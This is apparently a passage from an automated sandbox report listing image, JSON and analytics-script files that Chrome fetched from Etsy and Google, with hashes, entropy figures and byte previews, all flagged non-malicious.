                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):15631
                                                                                                                                                                              Entropy (8bit):7.918195601458425
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:F90197C061482922ADA4D5F7601B20D4
                                                                                                                                                                              SHA1:62DC2D125AC6D70A0311C6184854757F1C1F8B09
                                                                                                                                                                              SHA-256:BEF9B813800A7758BF94C705CEFC72C32C191F71BE6D3F1732E4637B885A680D
                                                                                                                                                                              SHA-512:632C655624047848AB452322E70CB83352EB510A14483F80188AC2BA7835CC21EC6DFAF1FC85C4259A37D2C856C98D4E7C7400CFE37131D9059E1BB448952F22
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd........T..".........................................;.........................!.1AQ."aq..2.#BR..$b.3Cr....c..S...............................3.......................!1.AQa."2q...R...B...#Cbr.............?...PA.J.....!#T.&.......b..h..!..0:.-......!...5...X8d.^).U.i...m....%..8.A..z.=ig.1sa....
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:GIF image data, version 89a, 24 x 24
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):9657
                                                                                                                                                                              Entropy (8bit):7.182897214043155
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:ECDD7E0A2957CC9E57BF1B4726337A33
                                                                                                                                                                              SHA1:B61B82B8719730F0C79CF741F375D53D91ADB0A5
                                                                                                                                                                              SHA-256:883BF9A28B4FB8916D07F4AD0B5ADCB6C47453AC69395A3600E0E790A95A54AA
                                                                                                                                                                              SHA-512:82405EEE67D9D7E0A0AAD88F3433F097FF012889B90C7007143379EF0D32E7C05BC32DE49E268DA9D4A9EDD8BC43253C0DA84D93C59BDC4FA48BED11294C9466
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:GIF89a............................................~~~......pppRRR.........|||......666:::@@@jjj......zzz.........<<<lll....xxx......444888...............000............nnn................$$$.........................bbb......FFFLLLPPPDDDJJJ......HHHBBB......NNN......(((222.........ZZZTTT...rrrXXX^^^ddd\\\VVV""" ...***......hhh...fff,,,......```...tttvvv...&&&...>>>.....................................................................................................................................................................................................................................................................................................................................................................................................................!..NETSCAPE2.0.....!.......,...............H.......A.a...B.,PC.....*..A....D..Qc"...2`......#..\p.....$h.....6x.@.@.....N.A.....p.8.(...9.. b.A!/P..HbE...;4<..B...M..`....%.:,.d.....4......V.FE..1.....U\ ....N..X...
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):55761
                                                                                                                                                                              Entropy (8bit):7.950418166624386
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:219B5D9617D22C48BD09B0384B8E165B
                                                                                                                                                                              SHA1:DB9857C9DCEAE4911B57F3F9F118BD7F1EDA9735
                                                                                                                                                                              SHA-256:002B59906DD19547FACC38C7626BF815FC1F8F8E89F06E5500F852AB48218308
                                                                                                                                                                              SHA-512:5690F27B98C789AAC7035FC89EE3C238A82CAF3BF8F560EC7BB7FE9637F648F0EB16A634DE47491572FBE8869B3828E76A95EF8AF3AFEC7970DF8F3EAFC5C0CD
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......X.X..".........................................A.........................!1A.."Q.2aq.#B...R...$3Cbr......4..%DS................................7......................!1..AQa.."q.2..BR.....C..#3.$r.............?..Il...zD.;.L..g.(1Vn..^..g.Y.Tth.H....U..C.*....N..i....6a.q.(.i..,*~.GU.J..<.zj
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):13864
                                                                                                                                                                              Entropy (8bit):7.974382767701529
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:B2392543F5001BF3768814B4B71AFB73
                                                                                                                                                                              SHA1:854E729FDF3CED2D2A7BE1784B4D5EF25F1C15AE
                                                                                                                                                                              SHA-256:6CFE1FD0484F931CD4C4A59A6CDF85DA5E31262AFAFDB085FDC880D75E29FD1D
                                                                                                                                                                              SHA-512:06C1FF32000894F16C2018333F7506F2D850BE5CE1A9D6D51F3827AA3E8BF60BB77ECFCD82CD20CE41EE6C1E8A784019EFB335509D6928DECB6ACB5F7C5F3C05
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/14114560/c/1371/1371/0/0/il/7cd4c5/2566957822/il_300x300.2566957822_cpx4.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@..................5....#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......,...,....pixi............ipma.................5"mdat....."%r....4 2.j.P...A@..8.n.{f.NT...)....RW.hb5.|5.;'.Y5.r.N.....%.....LG......~.z..:N...Q..QR......j.F.S..+.T^....].....<9.+...H..a:.\9.O.......s....$.......j8.x..e"MV....|...%t|..32...... .X...D....!..G.S%.......V....c..tJ......4.....o...9..VSoau...5,-.G}j.P..5....S.@_.3jC...y.K.7.W.y...V ..HA.......O.D...b.I.O...E....=....$Q.<3H/..&r..(.....tv..G...._...]............J.y.HD.U..X..Z.-.c....?....jJC..k....;..a|Z.}f.-..)...2]5..+...s+E..j....y.`q%.LK.:2^W..h#*...l#M.y.K..9...C...G.|.A....~..N..x.!>..W.y.r'C,..Yj%IW....+...U.f.1...$..W#J .....9......W,...6.v........b..:.r....`..h..m...6bT... ..G..S(,R..s...aa.....*UF........sz...X$.0B._..}.BoGqp<..tD0$..+.*.^.>.\.0%O...Ts%..^...,..
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):52243
                                                                                                                                                                              Entropy (8bit):7.947076468298557
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:A9FE516391FD8E7519ADAD89498AD9A9
                                                                                                                                                                              SHA1:95328A71C3998E0164500B2DEAA398AD297DC58C
                                                                                                                                                                              SHA-256:C4B68BAC2C86A32A26DABE02F98C1FC7278B65C6825ADFD53F49506A9CC7925F
                                                                                                                                                                              SHA-512:A8AC64B1CCF883FE5B506BA182AF65C85041D318E7549F56298BDCC6D754B0ADB6633265AA4D8714FE92CFA47113D7A7668D799471F1DF50766377F7BF38E179
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......X.X..".........................................D......................!1.A..Qa."q.....2......B...#Rbr.3.CD..$cs...................................:.......................!1..AQa..q."2...3..%BRbr.$4S.#5Cs............?........K..y..O..q..y.t?$c.h.D...y."A...Fl6>.....c.....8.p.P.I.F$........
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ASCII text, with very long lines (2343)
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):52916
                                                                                                                                                                              Entropy (8bit):5.51283890397623
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:575B5480531DA4D14E7453E2016FE0BC
                                                                                                                                                                              SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
                                                                                                                                                                              SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
                                                                                                                                                                              SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://www.google-analytics.com/analytics.js
                                                                                                                                                                              Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 100x100, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):4138
                                                                                                                                                                              Entropy (8bit):7.622352925424979
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:FE3FA1A7A585A3B9F8A2E1EE1B7C453A
                                                                                                                                                                              SHA1:10D4EC948CCB8EB3EA2821EEF8EBA147AD39107F
                                                                                                                                                                              SHA-256:4BB890C0EDA79F3B7E34CB0FE88CD9C01200FB9665687EE6656507A0B5F95A07
                                                                                                                                                                              SHA-512:45E7BFDBD0E46B6984A097F8C4C3A3BE8977B66B5AC043D165DE4922D375DE79136911E5DBFB696E919EE93B297B81758AA0759450CD48414006D32F36D29CF9
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......d.d.."........................................;.........................!..1A"Qq..2Ba..#R.C....$b3r...................................&.....................!1.AQaq."..2r..............?.......<.q.`.I`....x..bU...OLd.Q#Q.[-.......r.B...N.s9...m..n>_......|W..F....}.9......3.....x.+4.s....&(.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 100x100, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):2721
                                                                                                                                                                              Entropy (8bit):7.318056729365021
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:70C881642E406C8A837729B2C4888F72
                                                                                                                                                                              SHA1:2A5A70E264EEF07D4FA2D2DFF2089D2EE9BCB7C8
                                                                                                                                                                              SHA-256:B17B16D86FACE1DD8909243F468F50031986F418D9FB1F6660A80B513589911A
                                                                                                                                                                              SHA-512:732DA06D1327A4B4B30D9B8B8478E7D42B24828EA52D163EFA2FD9209E9AF32CEC075BE62F3039CE4CAA4980E6BFCCDC7136A627A286C4E1E760B56B94970800
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................."......".$...$.6*&&*6>424>LDDL_Z_||....C............................."......".$...$.6*&&*6>424>LDDL_Z_||.......d.d..".......................................3........................!..1A"Qa...q..2.#BRS..3................................*......................!1..2AQaq...."Bb.#............?...K.E..*0Z............PWA.....{....{.kS..Kh......>u.F.T..,.R.GC...|m.z......w.W.8,R.....w3.q^b..M".t.\..p
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 600x600, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):82873
                                                                                                                                                                              Entropy (8bit):7.963076460268416
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:BFEB24D0F46EC2AF0B53B8D943F3192A
                                                                                                                                                                              SHA1:C544B05085A59953D7D0CC324F8D1E5737735A56
                                                                                                                                                                              SHA-256:1B9516E60EA63EB5775B9DA5AD3660226CF927CA76455366E22FB0F20D164FE9
                                                                                                                                                                              SHA-512:74D184EF4E23F7476D64D33304161BA1A9EFA1FDBDB9B1C7667618D2AB36E713FB8B812DDEFA0A73F35C510C9B2BF253FA9F5F82E7B9DC4D1A1344841298D497
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......X.X..".........................................O.......................!..1.A."Qa.q..2B...#R...b...$3r..C...%4Sc..&5s.'7d.....................................E........................!.1A.."Qaq2..#3Br...R...4Sb..$Cs....ct.%..............?.......J..@.5$........R.&....>t.(Ii1.1.R...".!B84q@...&
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):4927
                                                                                                                                                                              Entropy (8bit):4.9021827024699975
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:7D683E03EF66A8BDBE92DDBE12F0039D
                                                                                                                                                                              SHA1:42F370CA0829EF9CF92D564A284A2D4E04D0E5A6
                                                                                                                                                                              SHA-256:0F67617768D6E34B2C8E91F5C09448E7DD97F691428FE9737C9329381650AE98
                                                                                                                                                                              SHA-512:E56F5E8A87CEC399504E9A387F7E970148C032EFDB7492062B7F769E8910A0C30D96036FBB4B7413052870FDB8278BA3FF77612A147D187DFABA8F4A87D05E8B
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://www.etsy.com/api/v3/ajax/bespoke/public/neu/specs/submenu?log_performance_metrics=false&specs%5Bsubmenu%5D%5B%5D=Etsy%5CModules%5CCategoryNav%5CSpecs%5CDropdownCatNav%5CDropdownSubmenu&runtime_analysis=false
                                                                                                                                                                              Preview:{"render_aborted":false,"abort_render_data":[],"output":{"submenu":"<div role=\"menu\" class=\"wt-menu__body wt-pt-xs-2 wt-pb-xs-2 ge-you-menu-dimensions wt-z-index-10 dropdown-category-menu__body\" data-wt-menu-body type=\"option\">\n <a href=\"\/c\/accessories?ref=catnav-1\" class=\"wt-menu__item wt-display-block wt-text-truncate wt-width-full wt-pr-xs-1 wt-position-relative wt-max-width-full \" role=\"menuitem\" tabindex=\"-1\" data-level=\"1\">\n Accessories\n <\/a><a href=\"\/c\/art-and-collectibles?ref=catnav-66\" class=\"wt-menu__item wt-display-block wt-text-truncate wt-width-full wt-pr-xs-1 wt-position-relative wt-max-width-full \" role=\"menuitem\" tabindex=\"-1\" data-level=\"1\">\n Art & Collectibles\n <\/a><a href=\"\/c\/baby?ref=catnav-12545\" class=\"wt-menu__item wt-display-block wt-text-truncate wt-width-full wt-pr-xs-1 wt-position-relative wt-max-width-full \" role=\"menuitem\" tabindex=\"-1\" data-level=\"1\">\n Baby\n <\/a><a href=
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):85053
                                                                                                                                                                              Entropy (8bit):7.997535523124024
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:61FA27A83ABE79C133D144ED36A26137
                                                                                                                                                                              SHA1:EEB66BEC118A0CD3BA1E7FEEF1B834C188619F5E
                                                                                                                                                                              SHA-256:0FF7AFA55743755E2D21A0B1F5D71FB5F6DC0EC41994E436A0FF623D4A651872
                                                                                                                                                                              SHA-512:ABBA5DEA8068DF10171DB8D20B230098F180233823B011C47AE963B7DF49225F8764A7741AE6C0746BA54A99C5E0A09F4D8D8D51EB3E068D951CFCBFFC575474
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/iap/14f6ae/6076138282/iap_600x600.6076138282_ho9xijqn.jpg?version=0
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@..................K/...#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma.................K7mdat.....&ey_.....2........!@...L.J.R.@R........Y..;3..X....Y..h.H.v%..N........'.^..h..{..)|..'t...0.y.W...c.......E%.;^7.|..}%#.g....v,J...aIq`.^ZgF.....M.Jv._..#..7...HY...a..Wrp.(.6.r....S....A..w^......,..{.~..K..../.s.....r0.vUF7...p...kxs.(5.J......{Z.!'..g+L...."...!...k..u...{........SK#d.......w.e.....V...|%...?....6..!m......Q2.bn3.K6^.1.9.r..).i./...y..Cu:BjS..G...iq.(4.8\3.[.a..+..s..T.}..y+x~.>.g.....w.x.T.^..O4.uF:p@....a.1..2[.ff.$..'......}..2.......n...p.9.......~.*m....K}.#....fj..Z..N..a.....W.....E+.9!.LtB..mNqq.hX<.;.m..qx>..~./.$..j...".g....+I...%Sq},h$U.U.:.n.ww.K.c..z...A....b.G..K..X..[:../..1....U....Y2..=f1Kz..B..H....f.fj..<.a..bJ.v...U.X.6.......L...[.?.3;....3.
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):1625
                                                                                                                                                                              Entropy (8bit):7.568629623682017
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:9917DB551A3FD04778D29323F62B1660
                                                                                                                                                                              SHA1:0F03F1A9C493E9B41E5D2F12324037BFC0E5AF39
                                                                                                                                                                              SHA-256:26495F1CF3E7BBACAB169DB7E995487C53FEDBD40EBE7046501D29D2D84223CE
                                                                                                                                                                              SHA-512:D2C10E0C9E9B8BDA6D5470B3554D07443DDF60BDB6A09CA36B039125BD52B8A3B85F1CCFEDC34B450FEC988202E6B6612C360C1BB31DAD651D0AD2D9D114FCEB
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/18152467/r/il/dd6858/5080366499/il_170x135.5080366499_3xrv.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@...................K...#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe................pixi............ipma..................Smdat.......a. !..2..Dt... P.y...lk..<...."o...x.?D.nL.].3...|.!..K..U...MG..W9.L...N....\.h2.D\......F.\D...@..h...q...~Dc^.... j....H%..(..X`....74}.U.-r>nc&.i..&0..r..(4u....2.-...v..B!*.$./.@..<...D..I.5s..x1i..1..r}Ko......+........K...^.2{h;iK..;....+j...<..2..OwVR..au....7..^tp..$..P.......o..]&..*.}#.r.|K=<.H.;.. s.!.Z.?l'.l....J.l9\..?a).7...JJs@...W.....K......yh..Mc.[....J.....Jx..u..<W.m..[~......G.!..P....cO..^....pa...m[._.gOH....++.*...x.,....di.Nh!....M.................c..K[n..5.2..yv...Y....T.E.!u..,...J......op.{.... '.`...n...X.u2.....k..".]~.#"..`*.......K3g..."....c..."D.Pu....].<.c..D9.....I..j2..-..H....>*.]._h...H ...:KE.*F..#5.p)...9......XQ.....9../{.c]..9>........
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 794x794, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):129995
                                                                                                                                                                              Entropy (8bit):7.970319019884722
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:25432DB8931AC354462729AFE582E0B6
                                                                                                                                                                              SHA1:2D77D2A78A4E13193A8A4F28C9672E4ED1DFC7E9
                                                                                                                                                                              SHA-256:44ECA258A55461E8B6F31DCFDCFDAE6D84ADE4BED56A00DBEA5D5FFC14F8F946
                                                                                                                                                                              SHA-512:F095C6623F3567B8DF60282FCE6B4EEFEC011DACAC2E069B1E2BCCA1DD95BBB6BFC1B8F908BD011B148316F4750D9F491AF6004E8DD6ED04AEA7A8B99D847DE8
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd...........".........................................D.........................!.1A."Qaq..2..#B.R....3br.$..%C...4Sc....................................8......................!1..AQa."q.2.....#B3R..Cb.$4cr..............?...s2..-.....~..J.fib...F.DH.r{....Y.E..+.k.!q.)..96..D.mA).2@O(~.J.....,VV
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):65547
                                                                                                                                                                              Entropy (8bit):7.996597003398024
                                                                                                                                                                              Encrypted:true
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:8280CCB7A8417AF8C3FBB1E46C5AF73D
                                                                                                                                                                              SHA1:FF100B18BF1AA09D5249AA3B3245B430B935F609
                                                                                                                                                                              SHA-256:2DEFBE0105AB01056265EB38F1D22BA8AF9FD88915E9976290642A0A564A4436
                                                                                                                                                                              SHA-512:A826C76BA0E4AFB5DB83634B551041BF4ECD6AF0516EE2C12A87366D8657238830A6364D85A7FB1D42D52A71E64238A837800893E9E798906CD28E6655533F94
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              URL:https://i.etsystatic.com/25837545/c/2250/2250/0/619/il/2fe84b/6164912389/il_600x600.6164912389_q12d.jpg
                                                                                                                                                                              Preview:....ftypavif....avifmif1miaf....meta.......!hdlr........pict.................pitm........."iloc....D@.......................#iinf..........infe........av01....jiprp...Kipco....colrnclx...........av1C........ispe.......X...X....pixi............ipma...................mdat.....&ey_.....2....p.E.Q@..P3....At.~.....q.?.<...'.h..}._...]..j."._Ld?].?l....4h...a....*.T.......`ojq....Bi..3.f......x........lo^.H...k.$..OF/.`.pGZ..0B..Dm....6$bV..=...VRO...1}...$...A>..9s..=......$P.[....J.i.r\..1..5QT.A... .L.'FX.u.$..~h..b...JK.Ru~...)..........E..@..L.P.=L.`.s.4,}b[y.JY._........>.I.-.C..V...L...-g.N....T....k(...L......7.[.e&0........aT6..3.......{.]l.. 1...(...~.9%...E.h..2}..._.x.e.g...u.=.g..Nn.\........W..]QF.T4...*..!.....]e..S..GA....V.I.~.......i,.),.*.g..?.<.S-.5..E.B..i3]...$R.....W..Z..k...y..=.VM....o.@gY.R.bF.H...f....lN>.J.B0...o^......S.......p..af.|.T.+VX.i.+e...O..~.........k..RZ~-..X.e.... |..$..]?..PZ.%5>..._...M.r...b.+kk......$..Ah...
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 50x50, components 3
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):1832
                                                                                                                                                                              Entropy (8bit):6.840723009207899
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:791E7C59CAE4EC66117E86F0FD990CD7
                                                                                                                                                                              SHA1:3A9F1C19C00D5FA4CABDE10699472F3A247C7CE6
                                                                                                                                                                              SHA-256:4672227CEA8A724AAEA737B350367281BE7A3BC9D3C4679EE294B3D311BF8108
                                                                                                                                                                              SHA-512:489C103F23282161B6F4E826E807DCB6AE3EEB3BEF0B1FAE0B70E679D2B737D5993763C5BAAC3D4C85B5AC91E1D7A0DE52E3E4B9A5AA9680856A4ED215442BFD
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                              Preview:......JFIF..............ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....FB..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0.....C............................................ .... %...%-))-969KKd...C............................................ .... %...%-))-969KKd......2.2.."........................................0..........................!1.AQa..."q2..3Bc..................................-.......................!..AQ...2bq..."1R..S............?.....~bi...bH..O..\.p..Uk.a.......q.....As.p..\.O..s.?.S.Q......=.X&...Z.O.>.d..s..c......,.(...,.DD!....
                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                                              Category:downloaded
                                                                                                                                                                              Size (bytes):20954
                                                                                                                                                                              Entropy (8bit):7.9870306889558575
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:
                                                                                                                                                                              MD5:C4FFEFB6BD9F4F631B6B7388F2270ACB
                                                                                                                                                                              SHA1:7F6F37708C530BEA4D437B3F1B57DE335E42D9B4
                                                                                                                                                                              SHA-256:7DA55AE2EA9847A7EE072E7F1BB499D654D76CE3EB304C28DCB1DC5EC7468B85
